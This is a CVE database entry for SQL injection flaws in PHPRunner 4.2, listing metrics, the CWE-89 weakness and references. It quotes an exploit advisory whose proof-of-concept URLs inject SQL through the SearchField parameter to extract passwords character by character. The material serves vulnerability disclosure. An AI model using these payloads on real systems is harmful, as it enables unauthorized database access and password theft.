CVE-2009-0963 : Detail

CVE-2009-0963

SQL Injection
A03-Injection
1.19%V4
Network
2009-03-19
09h00 +00:00
2018-10-10
16h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple SQL injection vulnerabilities in PHPRunner 4.2, and possibly earlier, allow remote attackers to execute arbitrary SQL commands via the SearchField parameter to (1) UserView_list.php, (2) orders_list.php, (3) users_list.php, and (4) Administrator_list.php.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 8226

Publication date : 2009-03-16 23h00 +00:00
Author : BugReport.IR
EDB Verified : Yes

##########################www.BugReport.ir######################################## # # AmnPardaz Security Research Team # # Title: PHPRunner SQL Injection # Vendor: http://www.xlinesoft.com # Vulnerable Version: 4.2 (prior versions also may be affected) # Exploitation: Remote with browser # Original Advisory: http://www.bugreport.ir/index_63.htm # Fix: N/A ################################################################################### #################### - Description: #################### PHPRunner builds visually appealing web interface for popular databases. Your web site visitors will be able to easily search, add, edit, delete and exprt data in MySQL, Oracle, SQL Server, MS Access, and Postgre databases. #################### - Vulnerability: #################### Input passed to the "SearchField" parameters in "UserView_list.php" is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Vulnerable Pages: 'orders_list.php' , 'users_list.php' , 'Administrator_list.php' #################### - PoC: #################### Its possible to obtain plain text passwords from database by blind fishing exploit http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like '%%')-- http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)='a')-- http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)='ab')-- #################### - Solution: #################### Edit the source code to ensure that inputs are properly sanitized. #################### - Credit: #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com # milw0rm.com [2009-03-17]

Products Mentioned

Configuraton 0

Xlinesoft>>Phprunner >> Version To (including) 4.2

Xlinesoft>>Phprunner >> Version 3.1

    References

    http://www.securityfocus.com/bid/34146
    Tags : vdb-entry, x_refsource_BID
    https://www.exploit-db.com/exploits/8226
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://osvdb.org/52799
    Tags : vdb-entry, x_refsource_OSVDB
    http://secunia.com/advisories/34330
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.vupen.com/english/advisories/2009/0750
    Tags : vdb-entry, x_refsource_VUPEN
    http://osvdb.org/52801
    Tags : vdb-entry, x_refsource_OSVDB
    http://osvdb.org/52800
    Tags : vdb-entry, x_refsource_OSVDB
    http://osvdb.org/52798
    Tags : vdb-entry, x_refsource_OSVDB